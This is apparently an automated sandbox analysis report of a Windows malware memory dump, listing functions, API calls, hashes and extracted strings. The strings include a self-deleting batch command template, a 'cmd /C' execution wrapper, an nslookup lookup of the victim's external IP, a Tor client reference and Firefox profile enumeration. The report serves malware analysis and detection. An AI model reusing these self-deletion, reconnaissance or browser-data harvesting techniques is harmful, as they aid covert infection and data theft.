Sleep.KERNEL32(000001F4,00CB0F94,00000000,00000000), ref: 00CB5A80
CloseHandle.KERNEL32(?), ref: 00CB5A8D
LocalFree.KERNEL32(?), ref: 00CB5A9B
RtlDeleteCriticalSection.NTDLL(00000008), ref: 00CB5AA5

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CloseCriticalHandleSection$DeleteEnterEventExchangeFreeInterlockedLeaveLocalObjectSingleSleepWait
String ID:
API String ID: 1408595562-0
Opcode ID: 84e6f8a0513627c091b6893793890db463313534c9d0f452bceeaebc548bce39
Instruction ID: 2f02824bd96145e2785ffe97798537c3d503ff3a0983d9aa8214d4b0464956d3
Opcode Fuzzy Hash: 84e6f8a0513627c091b6893793890db463313534c9d0f452bceeaebc548bce39
Instruction Fuzzy Hash: BC118E31500A16AFCB20AF65EC88BAF77BCBF04345B044A15F692E3120CB35E948DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB209D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 134memorystringCOMMON

Download Yara Rule

APIs

StrChrA.SHLWAPI(00000000,00000020,00000000), ref: 00CB20C8
StrTrimA.SHLWAPI(00000000,0A0D0920), ref: 00CB20E5
HeapFree.KERNEL32(00000000,00000000), ref: 00CB2118
RtlImageNtHeader.NTDLL(00000000), ref: 00CB2143
HeapFree.KERNEL32(00000000,00000000,00000007,00000001,00000000,00000000), ref: 00CB2200

Part of subcall function 00CA32D8: lstrlen.KERNEL32(?,00000000,74786980,?,00CAAEA4,?), ref: 00CA32E1
Part of subcall function 00CA32D8: memcpy.NTDLL(00000000,?,00000000,?), ref: 00CA3304
Part of subcall function 00CA32D8: memset.NTDLL ref: 00CA3313

lstrlen.KERNEL32(00000000,00000000,0000014C,00000000,00000000), ref: 00CB21AF
HeapFree.KERNEL32(00000000,00000000,00000000,0000014C,00000000,00000000), ref: 00CB21E0

Strings

TorClient, xrefs: 00CB217E, 00CB21CB

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FreeHeap$lstrlen$HeaderImageTrimmemcpymemset
String ID: TorClient
API String ID: 239510280-3399603969
Opcode ID: a435b6964c377572f76c6a3020d837944e29db96cbb503939a2541124d0c5a31
Instruction ID: 43f2e6c692913b09c5a6cad5c57580bb15bf3e82640b13163b9b7282773585cf
Opcode Fuzzy Hash: a435b6964c377572f76c6a3020d837944e29db96cbb503939a2541124d0c5a31
Instruction Fuzzy Hash: C341F531640204FBEB22AB98DC85FEE7BADEF45B40F140125FA05AA1E0DBB48F45E750

Uniqueness

Uniqueness Score: -1.00%

Function 00CA091D, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 125memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000001,00000000,00000000,74785520,00C96990,74785520,00000001,@ID@,00CAF47B,?), ref: 00CA0934
lstrlen.KERNEL32(?), ref: 00CA0944
RtlAllocateHeap.NTDLL(00000000,00000001), ref: 00CA0978
RtlReAllocateHeap.NTDLL(00000000,00000000,?,?), ref: 00CA09A3
memcpy.NTDLL(00000000,?,?), ref: 00CA09C2
HeapFree.KERNEL32(00000000,00000000), ref: 00CA0A23
memcpy.NTDLL(?,?,?,?,?,?,?,?), ref: 00CA0A45

Strings

W, xrefs: 00CA0A71

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Allocatelstrlenmemcpy$Free
String ID: W
API String ID: 3204852930-655174618
Opcode ID: bdf0e5968527428a53aa3ccd8c7a2fc75284e1bad989b839ae2caa4fa8948af9
Instruction ID: 9d8791e9b183ec2658ec4e43c16bc40f1e13d1b47cb2cb9288c87e0fbf19aedd
Opcode Fuzzy Hash: bdf0e5968527428a53aa3ccd8c7a2fc75284e1bad989b839ae2caa4fa8948af9
Instruction Fuzzy Hash: 5C410A7190020AEFDF11DF95CC84AAE7BB9FF05388F248469E915E7211E7319E54EB60

Uniqueness

Uniqueness Score: -1.00%

Function 00C9A123, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 118memoryCOMMON

Download Yara Rule

APIs

RtlImageNtHeader.NTDLL(?), ref: 00C9A144

Part of subcall function 00CA1B2B: lstrlenW.KERNEL32(00000000,00000000,00000094,%APPDATA%\Microsoft\,00000000,?,?,00C9A164,?), ref: 00CA1B50
Part of subcall function 00CA1B2B: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA1B62
Part of subcall function 00CA1B2B: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,00C9A164,?), ref: 00CA1B7F
Part of subcall function 00CA1B2B: lstrlenW.KERNEL32(00000000,?,?,00C9A164,?), ref: 00CA1B8B
Part of subcall function 00CA1B2B: HeapFree.KERNEL32(00000000,00000000,?,?,00C9A164,?), ref: 00CA1B9F

RtlEnterCriticalSection.NTDLL(00000000), ref: 00C9A17C
CloseHandle.KERNEL32(?), ref: 00C9A18A
HeapFree.KERNEL32(00000000,?,?,00000001,.dll,?,00001000,?,?,?), ref: 00C9A242
RtlLeaveCriticalSection.NTDLL(00000000), ref: 00C9A251
HeapFree.KERNEL32(00000000,00000000,.dll,?,00001000,?,?,?), ref: 00C9A264

Strings

.dll, xrefs: 00C9A199
.exe, xrefs: 00C9A1A0, 00C9A1B2, 00C9A1E8

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$Free$CriticalSectionlstrlen$AllocateCloseCreateDirectoryEnterHandleHeaderImageLeave
String ID: .dll$.exe
API String ID: 1719504581-724907077
Opcode ID: 96f9d9ee6d7f6405114d7faade35590ade7d067719f4958bfef2120219d6f03d
Instruction ID: a9d285d31c620247bed7e9b0524e4aae4b40b9f1910bae58baf705fbf608a1fb
Opcode Fuzzy Hash: 96f9d9ee6d7f6405114d7faade35590ade7d067719f4958bfef2120219d6f03d
Instruction Fuzzy Hash: 6B41D231A00605EBDF21AF94EC88FAE7BB8AF44740F100129F915A7161DB71DE44CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 00CB1A07, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 110memoryfilestringCOMMON

Download Yara Rule

APIs

InterlockedIncrement.KERNEL32(00CBDF6C), ref: 00CB1A19
lstrcpy.KERNEL32(00000000), ref: 00CB1A4E

Part of subcall function 00CB134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,00CA1372,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?,00000001), ref: 00CB135A
Part of subcall function 00CB134B: mbstowcs.NTDLL ref: 00CB1376

GetLastError.KERNEL32(00000000), ref: 00CB1ADF
HeapFree.KERNEL32(00000000,?), ref: 00CB1AF6
InterlockedDecrement.KERNEL32(00CBDF6C), ref: 00CB1B0D
DeleteFileA.KERNEL32(00000000), ref: 00CB1B2E
HeapFree.KERNEL32(00000000,00000000), ref: 00CB1B3E

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

Strings

.avi, xrefs: 00CB1A41

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: FileTemp$FreeHeapInterlockedPathTimelstrcpy$CurrentDecrementDeleteErrorIncrementLastNameSystemThreadlstrlenmbstowcs
String ID: .avi
API String ID: 908044853-1706533258
Opcode ID: 585f0597d8f80be6e90eb06c6cd5a5fa11517d8651b9cb79fffe0b1273dfd738
Instruction ID: d41e1093842a4685953e4b23642b65eb0d9b40e132ba47c8edf4afdf15724d78
Opcode Fuzzy Hash: 585f0597d8f80be6e90eb06c6cd5a5fa11517d8651b9cb79fffe0b1273dfd738
Instruction Fuzzy Hash: A031E372900114BBCB11AFE5DC54BEE7BB9EB48781F684121F905E7190EB708E45E7A0

Uniqueness

Uniqueness Score: -1.00%

Function 00C9DA1D, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 88memoryfilestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8812
Part of subcall function 00CA8800: GetTempPathA.KERNEL32(00000000,00000000,0000001D,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA882B
Part of subcall function 00CA8800: GetCurrentThreadId.KERNEL32 ref: 00CA8838
Part of subcall function 00CA8800: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8844
Part of subcall function 00CA8800: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00CABE68,00000000,?,00000000,00000000,?), ref: 00CA8852
Part of subcall function 00CA8800: lstrcpy.KERNEL32(00000000), ref: 00CA8874

lstrlen.KERNEL32(00000000,00000000,00000F00,00000000), ref: 00C9DA41

Part of subcall function 00CA78E3: lstrlen.KERNEL32(00000000,747DF730,-00000001,00000000,?,?,?,00C9DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00CA78F4
Part of subcall function 00CA78E3: lstrlen.KERNEL32(?,?,?,?,00C9DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00CA78FB
Part of subcall function 00CA78E3: RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA790D
Part of subcall function 00CA78E3: _snprintf.NTDLL ref: 00CA7930
Part of subcall function 00CA78E3: _snprintf.NTDLL ref: 00CA7959
Part of subcall function 00CA78E3: HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 00CA797A

StrTrimA.SHLWAPI(00000000, s:,?,?,?,?,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00C9DACD
HeapFree.KERNEL32(00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00C9DAEA
DeleteFileA.KERNEL32(00000000,00000000,00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00C9DAF2
HeapFree.KERNEL32(00000000,00000000,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00C9DB01

Strings

nslookup myip.opendns.com resolver1.opendns.com , xrefs: 00C9DA4E
ss: *.*.*.*, xrefs: 00C9DA83, 00C9DA88, 00C9DAAB
s:, xrefs: 00C9DAC3

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$FileFreeTemplstrlen$PathTime_snprintf$AllocateCurrentDeleteNameSystemThreadTrimlstrcpy
String ID: s:$nslookup myip.opendns.com resolver1.opendns.com $ss: *.*.*.*
API String ID: 2960378068-949792001
Opcode ID: 428ee74e6ccc87b2675f60a76f834974783e68abc1cd10cf00437cce6c895a16
Instruction ID: dfbaf341ffbe6c83cfe8cc9e566c9fbc7d2a551c5240c3001648f00dde16b85c
Opcode Fuzzy Hash: 428ee74e6ccc87b2675f60a76f834974783e68abc1cd10cf00437cce6c895a16
Instruction Fuzzy Hash: 09213272A04206BBDF11ABE9CC89FEF7BBCAB15354F040564F516E2151EB749A04D760

Uniqueness

Uniqueness Score: -1.00%

Function 00C9EF65, Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00000000,?,?,?), ref: 00C9EF89

Part of subcall function 00CAC747: lstrcpy.KERNEL32(-000000FC,00000000), ref: 00CAC781
Part of subcall function 00CAC747: CreateDirectoryA.KERNEL32(00000000,00000000,?,00002365,00000000,?,00C9EF96,?,?,?), ref: 00CAC793
Part of subcall function 00CAC747: GetTickCount.KERNEL32 ref: 00CAC79E
Part of subcall function 00CAC747: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,?,00002365,00000000,?,00C9EF96,?,?,?), ref: 00CAC7AA
Part of subcall function 00CAC747: lstrcpy.KERNEL32(00000000), ref: 00CAC7C4

Part of subcall function 00CB247D: RtlAllocateHeap.NTDLL(00000000,00000200,00CA6D11), ref: 00CB2489

lstrcpy.KERNEL32(00000000), ref: 00C9EFB9
wsprintfA.USER32 ref: 00C9EFCC
GetTickCount.KERNEL32 ref: 00C9EFE1
wsprintfA.USER32 ref: 00C9EFEF

Part of subcall function 00CA4FB0: RtlFreeHeap.NTDLL(00000000,00000200,00CA6EB2,00000000,00000100,00000200), ref: 00CA4FBC

Strings

attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0, xrefs: 00C9EFE9
.bat, xrefs: 00C9EFAC
"%S", xrefs: 00C9EFC6

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrcpy$CountHeapTickwsprintf$AllocateCreateDirectoryFileFreeNameTemplstrlen
String ID: "%S"$.bat$attrib -r -s -h %%1:%udel %%1if exist %%1 goto %udel %%0
API String ID: 1152860224-2880143881
Opcode ID: a676431df62a3e21ad81d3351ef597d6c31e7088646f91422eb349d21957f288
Instruction ID: 966d1edf6d07cab02fd5143cfbaa23517aa03bf9f0def3a0f3e0531b9bb73f41
Opcode Fuzzy Hash: a676431df62a3e21ad81d3351ef597d6c31e7088646f91422eb349d21957f288
Instruction Fuzzy Hash: 5611E0726013167FC2103BB4AC49F9F7A8CDF86758F048428FD45A2213DFB49D069AB5

Uniqueness

Uniqueness Score: -1.00%

Function 00CA78E3, Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 62memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,747DF730,-00000001,00000000,?,?,?,00C9DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00CA78F4
lstrlen.KERNEL32(?,?,?,?,00C9DA5E,nslookup myip.opendns.com resolver1.opendns.com ,00000000,000000FF), ref: 00CA78FB
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA790D
_snprintf.NTDLL ref: 00CA7930

Part of subcall function 00C9B598: memset.NTDLL ref: 00C9B5AD
Part of subcall function 00C9B598: lstrlenW.KERNEL32(00000000,00000000,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B5E6
Part of subcall function 00C9B598: wcstombs.NTDLL ref: 00C9B5F0
Part of subcall function 00C9B598: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,0C000000,00000000,00000000,00000044,?,00000000,77E5DBB0,00000000,cmd /C "%s> %s1"), ref: 00C9B621
Part of subcall function 00C9B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B64D
Part of subcall function 00C9B598: TerminateProcess.KERNEL32(?,000003E5), ref: 00C9B663
Part of subcall function 00C9B598: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00CA793E), ref: 00C9B677
Part of subcall function 00C9B598: CloseHandle.KERNEL32(?), ref: 00C9B6AA
Part of subcall function 00C9B598: CloseHandle.KERNEL32(?), ref: 00C9B6AF

_snprintf.NTDLL ref: 00CA7959

Part of subcall function 00C9B598: GetLastError.KERNEL32 ref: 00C9B67B
Part of subcall function 00C9B598: GetExitCodeProcess.KERNEL32(?,00000001), ref: 00C9B69B

HeapFree.KERNEL32(00000000,000000FF,00000000,?,?,?,?,00000000,000000FF), ref: 00CA797A

Strings

echo -------- >, xrefs: 00CA794D
cmd /C "%s> %s1", xrefs: 00CA791F, 00CA7927, 00CA7952

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Processlstrlen$CloseHandleHeapMultipleObjectsWait_snprintf$AllocateCodeCreateErrorExitFreeLastTerminatememsetwcstombs
String ID: cmd /C "%s> %s1"$echo -------- >
API String ID: 1481739438-1722754249
Opcode ID: 2f8895755bbe23c88760e9e7b5450eb38bc73921dbffe67623564471c9bb9d8e
Instruction ID: 575980a34441efe57b6fdf05e7ce8ef94cff22134d3b9fc3b6938e2f9b7cb8b4
Opcode Fuzzy Hash: 2f8895755bbe23c88760e9e7b5450eb38bc73921dbffe67623564471c9bb9d8e
Instruction Fuzzy Hash: BC11BF72800118BBCF126F94DC05EDE7F39FF497A4F114216F90466260C7319E10DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CAAF8A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55memoryregistrystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00C9AB0F,00000000,00000000,00CBE280,?,?,00C94379,00C9AB0F,00000000,00C9AB0F,00CBE260), ref: 00CAAF9D
RtlAllocateHeap.NTDLL(00000000,-00000005), ref: 00CAAFAB
wsprintfA.USER32 ref: 00CAAFC0
RegCreateKeyA.ADVAPI32(80000001,00CBE260,00000000), ref: 00CAAFD8
lstrlen.KERNEL32(?), ref: 00CAAFE7
RegCloseKey.ADVAPI32(?), ref: 00CAB000
HeapFree.KERNEL32(00000000,00000000), ref: 00CAB00F

Strings

@%s@, xrefs: 00CAAFBA

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heaplstrlen$AllocateCloseCreateFreewsprintf
String ID: @%s@
API String ID: 3908752696-4128794767
Opcode ID: 30013f6ad70cbf50da4b119d9cd08e86b7446c57f4cedcad869e9b29b3df408f
Instruction ID: ec84c755125bf5b99f0034ddbc4eb2f24211d9f6be75a8bb9ff61ebb13fd0372
Opcode Fuzzy Hash: 30013f6ad70cbf50da4b119d9cd08e86b7446c57f4cedcad869e9b29b3df408f
Instruction Fuzzy Hash: C3019E36200108BFEB116B94EC89FAE3B3DEB49758F104220FA06D11A0EBB28D14DB60

Uniqueness

Uniqueness Score: -1.00%

Function 00CB14AB, Relevance: 13.6, APIs: 9, Instructions: 110stringmemoryCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(00000000,00000000,00000000,74785520,?,?,00000022,00000000,00000000,00000000,?,?), ref: 00CB14C2
lstrlen.KERNEL32(?), ref: 00CB14CA
lstrlen.KERNEL32(?), ref: 00CB1535
RtlAllocateHeap.NTDLL(00000000,?), ref: 00CB1560
memcpy.NTDLL(00000000,00000002,?), ref: 00CB1571
memcpy.NTDLL(00000000,?,?), ref: 00CB1587
memcpy.NTDLL(00000000,?,?,00000000,?,?), ref: 00CB1599
memcpy.NTDLL(00000000,00CB83E4,00000002,00000000,?,?,00000000,?,?), ref: 00CB15AC
memcpy.NTDLL(00000000,?,00000002), ref: 00CB15C1

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: memcpy$lstrlen$AllocateHeap
String ID:
API String ID: 3386453358-0
Opcode ID: 9ebd1c2c0d9d248c636d281252717d9524614044d3a02234baa5261108cc9a28
Instruction ID: 62b64074a45161abc878d2b8135dc3f5e3fbd04835dea5a11c7959b9875ce93b
Opcode Fuzzy Hash: 9ebd1c2c0d9d248c636d281252717d9524614044d3a02234baa5261108cc9a28
Instruction Fuzzy Hash: 2F411872D0021AEBCF11DFA8CC81ADEBBB9EF48354F184466ED15A3211E631EB55DB90

Uniqueness

Uniqueness Score: -1.00%

Function 00CAE710, Relevance: 13.6, APIs: 9, Instructions: 109memorystringCOMMON

Download Yara Rule

APIs

Part of subcall function 00CAB8FB: RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CAB903
Part of subcall function 00CAB8FB: RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CAB918
Part of subcall function 00CAB8FB: InterlockedIncrement.KERNEL32(0000001C), ref: 00CAB931

RtlAllocateHeap.NTDLL(00000000,00CB26D1,00000000), ref: 00CAE761
lstrlen.KERNEL32(00000008,?,?,?,00CB26D1,00000000), ref: 00CAE770
RtlAllocateHeap.NTDLL(00000000,-00000021), ref: 00CAE782
HeapFree.KERNEL32(00000000,00000000,?,?,?,00CB26D1,00000000), ref: 00CAE792
memcpy.NTDLL(00000000,00000000,00CB26D1,?,?,?,00CB26D1,00000000), ref: 00CAE7A4
lstrcpy.KERNEL32(00000020,00000008), ref: 00CAE7D6
RtlEnterCriticalSection.NTDLL(00CBE268), ref: 00CAE7E2
RtlLeaveCriticalSection.NTDLL(00CBE268), ref: 00CAE83A

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: CriticalSection$Heap$AllocateEnterLeave$FreeIncrementInterlockedlstrcpylstrlenmemcpy
String ID:
API String ID: 3746371830-0
Opcode ID: e2c2ab2bafb186ad74f7a59cbfca64ba9be9fe8aea0e786f20ee7b9c85b89379
Instruction ID: 00c0e1959d9e93438022dbe670c04dbaf4410735b8a2403ff5fa2f7ac72efc68
Opcode Fuzzy Hash: e2c2ab2bafb186ad74f7a59cbfca64ba9be9fe8aea0e786f20ee7b9c85b89379
Instruction Fuzzy Hash: A841AB70500706EFDB219FA8DC84B9E7BF8FF05749F108219F81A93290DB309A44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 00CA4241, Relevance: 13.6, APIs: 9, Instructions: 90filesynchronizationCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000001,00000080,00000000,00000008,00000000,00000000,00000000,00CA1ED8), ref: 00CA4282
GetLastError.KERNEL32 ref: 00CA428C
WaitForSingleObject.KERNEL32(000000C8), ref: 00CA42B1
CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,?,00000080,00000000), ref: 00CA42D2
SetFilePointer.KERNEL32(00000006,00000000,00000000,00000002), ref: 00CA42FA
WriteFile.KERNEL32(00000006,00001388,?,00000002,00000000), ref: 00CA430F
SetEndOfFile.KERNEL32(00000006), ref: 00CA431C
GetLastError.KERNEL32 ref: 00CA4328
CloseHandle.KERNEL32(00000006), ref: 00CA4334

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: File$CreateErrorLast$CloseHandleObjectPointerSingleWaitWrite
String ID:
API String ID: 2864405449-0
Opcode ID: 2b4e8f08857450d3bdcecaf038b164b1b4d5288c843cf390a6d4ea7aad7c5536
Instruction ID: dc18a4dfb23abb3a387bb4b96d11ad8feb05817d27516211ef3e6ba5a07b186f
Opcode Fuzzy Hash: 2b4e8f08857450d3bdcecaf038b164b1b4d5288c843cf390a6d4ea7aad7c5536
Instruction Fuzzy Hash: 0D315E71900209FBEF119FA4ED09BAE7BB9EB45319F204254F920E61A0C7B48A58DB65

Uniqueness

Uniqueness Score: -1.00%

Function 00CA2EE9, Relevance: 13.6, APIs: 9, Instructions: 82fileCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000001,00000000,00C9EF3A,00000008,00CA79A9,00000010,00000001,00000000,0000012B,00CA79A9,00000000), ref: 00CA2F08
WriteFile.KERNEL32(?,00000001,?,?,?), ref: 00CA2F3C
ReadFile.KERNEL32(?,00000001,?,?,?), ref: 00CA2F44
GetLastError.KERNEL32 ref: 00CA2F4E
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,00002710), ref: 00CA2F6A
GetOverlappedResult.KERNEL32(?,?,?,00000000), ref: 00CA2F83
CancelIo.KERNEL32(?), ref: 00CA2F98
CloseHandle.KERNEL32(?), ref: 00CA2FA8
GetLastError.KERNEL32 ref: 00CA2FB0

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: ErrorFileLast$CancelCloseCreateEventHandleMultipleObjectsOverlappedReadResultWaitWrite
String ID:
API String ID: 4263211335-0
Opcode ID: 5fce8a9439d430a697e6731d9f12bacbce2ab12b5244979a4ceecb9d6784d9e7
Instruction ID: c5ed2ec98904b1f317c4c47decbb974508f7eb08044a799fe9002c986127cfbd
Opcode Fuzzy Hash: 5fce8a9439d430a697e6731d9f12bacbce2ab12b5244979a4ceecb9d6784d9e7
Instruction Fuzzy Hash: D3217F72900129BFCB00AFECEC48ADE7B7DFB49754F008521F916D2160DB708A49CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 00CA04D7, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?), ref: 00CA0525
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00CA4545), ref: 00CA0558
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CA057F
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 00CA0593
GetComputerNameW.KERNEL32(00000000,00000000), ref: 00CA05A0
HeapFree.KERNEL32(00000000,00000000), ref: 00CA05C3

Strings

Client, xrefs: 00CA04DE

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: Heap$AllocateComputerFreeName
String ID: Client
API String ID: 3439771632-3236430179
Opcode ID: 525ccfd64eb651cc46af4beff313447476f6e41c92349b2eae832a4ecb21a5c8
Instruction ID: 55f879e34f0b8142189aa6e812d80427797a58a721e1b12b212d9e0679a01609
Opcode Fuzzy Hash: 525ccfd64eb651cc46af4beff313447476f6e41c92349b2eae832a4ecb21a5c8
Instruction Fuzzy Hash: F6310A72A00206EFDB10DFA9DC85BAEB7F9FB44744F254569E505D3250EB70EE049B24

Uniqueness

Uniqueness Score: -1.00%

Function 00CAB0AA, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 105stringsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 00CB134B: lstrlen.KERNEL32(?,00000008,00000000,?,74785520,00CA1372,?,?,00000000,00C91589,?,00000000,?,00CA5B4A,?,00000001), ref: 00CB135A
Part of subcall function 00CB134B: mbstowcs.NTDLL ref: 00CB1376

lstrlenW.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00C97010), ref: 00CAB0FD

Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,00000000,%APPDATA%\Mozilla\Firefox\Profiles,?,00000250,?,00000000), ref: 00CA88D9
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?,?,00000000), ref: 00CA88E5
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA892D
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8948
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8980
Part of subcall function 00CA888D: lstrlenW.KERNEL32(?), ref: 00CA8988
Part of subcall function 00CA888D: memset.NTDLL ref: 00CA89AB
Part of subcall function 00CA888D: wcscpy.NTDLL ref: 00CA89BD

PathFindFileNameW.SHLWAPI(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 00CAB117
lstrlenW.KERNEL32(00000001,?,?,?,?,?,?,?,?,?,?,?,00C97010), ref: 00CAB141

Part of subcall function 00CA888D: PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 00CA89E3
Part of subcall function 00CA888D: RtlEnterCriticalSection.NTDLL(?), ref: 00CA8A18
Part of subcall function 00CA888D: RtlLeaveCriticalSection.NTDLL(?), ref: 00CA8A34
Part of subcall function 00CA888D: FindNextFileW.KERNEL32(?,00000000), ref: 00CA8A4D
Part of subcall function 00CA888D: WaitForSingleObject.KERNEL32(00000000), ref: 00CA8A5F
Part of subcall function 00CA888D: FindClose.KERNEL32(?), ref: 00CA8A74
Part of subcall function 00CA888D: FindFirstFileW.KERNEL32(00000000,00000000), ref: 00CA8A88
Part of subcall function 00CA888D: lstrlenW.KERNEL32(0000002C), ref: 00CA8AAA

LocalFree.KERNEL32(?,?,?,?,00000000,00000000,00000000), ref: 00CAB15E
WaitForSingleObject.KERNEL32(00000000,00000000,*.*,?,00000000,00000000,00000000), ref: 00CAB17F
PathFindFileNameW.SHLWAPI(0000001E,?,?,?,?,?,?,?,?,?,?,?,00C97010), ref: 00CAB194

Strings

*.*, xrefs: 00CAB107

Memory Dump Source

Source File: 00000001.00000002.619957348.0000000000C90000.00000040.00000001.sdmp, Offset: 00C90000, based on PE: false

Yara matches

Similarity

API ID: lstrlen$Find$File$NamePath$CriticalFirstObjectSectionSingleWaitmemset$CloseEnterFreeLeaveLocalNextmbstowcswcscpy
String ID: *.*
API String ID: 2670873185-438819550
Opcode ID: e5fb5d53df5658edd25d1346dc8708883d1d662efcd36b48b1fdfbb645275e62
Instruction ID: 6b2f1abea9e7757e9ccd262fcc34f563ccbd9834ae81bcc7815fd9adc169eb58
